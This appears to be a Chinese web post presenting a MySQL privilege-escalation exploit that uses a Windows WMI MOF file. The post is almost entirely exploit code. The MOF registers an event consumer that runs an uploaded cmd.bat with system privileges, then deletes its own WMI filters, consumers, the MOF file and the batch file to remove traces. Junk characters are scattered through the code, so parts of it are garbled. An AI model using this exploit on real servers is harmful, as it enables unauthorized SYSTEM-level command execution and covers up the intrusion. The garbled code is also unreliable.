Mysql 提权即时无错Mof exp

admin

这个sql提权MOF需要运行 system下的文件，不能定义路径。
1 {2 m  }0 X* ^7 l& T7 b. ]* h需要将要运行的命令写入到bat上传到system32目录，然后执行。

+ N- r) B' \9 W# @1 J0 m这个sql提权MOF需要运行 system下的文件，不能定义路径。
需要将要运行的命令写入到bat上传到system32目录，然后执行。

#pragma
& m, Q7 E5 R# N) Z5 ]0 i, |                        namespace("\\\\.\\root\\cimv2")
                        class
                        MyClass547
; H6 }9 T6 S! O; O8 \: P  l                        {           [key]
                        string
                        Name;
) w# N, V) r- [, I( y, I& d                        };
% X4 \/ W7 ]& E9 _" o& u5 E7 S                        class
                        ActiveScriptEventConsumer
                        : __EventConsumer {          [key]
                        string
                        Name;           [not_null]
, s6 ~# r1 O6 h                        string
                        ScriptingEngine;           string
                        ScriptFileName;           [template]
: O8 q! q' L4 O+ P8 G                        string
                        ScriptText;         uint32 KillTimeout;
3 N+ q2 Y) Q1 S0 E& r! y                        }; instance of __Win32Provider as $P {
                        Name
                        =
: {! V9 D- ~4 o8 O- M                        "ActiveScriptEventConsumer";     CLSID =
; B4 }: k. f2 X/ Q  p                        "{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";
                        PerUserInitialization
                        = TRUE;
                        }; instance of __EventConsumerProviderRegistration {         Provider
                        = $P;         ConsumerClassNames
7 [3 ~5 J. B; H, y. G# d) Q                        =
                        {"ActiveScriptEventConsumer"};
                        };
# [9 }1 q, X+ F7 y# R                        Instance of ActiveScriptEventConsumer
                        as $cons {         Name
                        =
                        "ASEC";         ScriptingEngine
7 K" d) E' j% W5 l( {                        =
                        "JScript";         ScriptText
                        =
" _. V7 I; Q, z                        "\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"cmd.bat\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass547\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};";          };
" n' }8 P5 m; Z6 X+ i& t3 W                        Instance of ActiveScriptEventConsumer
                        as $cons2 {         Name
/ Q" K$ g& e8 `                        =
  A  o7 u/ w+ x7 u                        "qndASEC";         ScriptingEngine
                        =
, r% I' C* ?, |0 E, h. `/ }                        "JScript";         ScriptText
                        =
" J% G8 Y& {" v- y. P                        "\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\hBsBa.mof\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"cmd.bat\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";
& ~* R( w* O+ u- l                        }; instance of __EventFilter as $Filt {         Name
' A* _3 {2 a, h: h                        =
" W9 {( a; o3 s, D9 u8 W2 n                        "instfilt";         Query
                        =
0 O% U( o( E  j/ O; M# Y                        "SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass547\"";         QueryLanguage
0 D0 C$ w* [) Q" x% C+ g                        =
                        "WQL";         }; instance of __EventFilter as $Filt2 {         Name
7 a. @  F% ~* A9 E                        =
                        "qndfilt";         Query
- V( l9 p4 M9 s$ b- @2 \                        =
3 |* v: g# ~, G                        "SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"cmd.bat\"";         QueryLanguage
5 M7 x0 i" g3 i6 m, o$ x+ @                        =
                        "WQL";          }; instance of __FilterToConsumerBinding as $bind {         Consumer
6 {/ `3 D9 F0 V                        = $cons;         Filter
% W  ~" H! D% M( ]                        = $Filt;
                        }; instance of __FilterToConsumerBinding as $bind2 {         Consumer
                        = $cons2;         Filter
# o9 T0 _5 d1 J6 U) Q                        = $Filt2;
                        }; instance of MyClass547
7 R5 I+ l4 W( }8 M0 y: F, H8 t7 [                        as $MyClass {         Name
                        =
                        "ClassConsumer";
                        };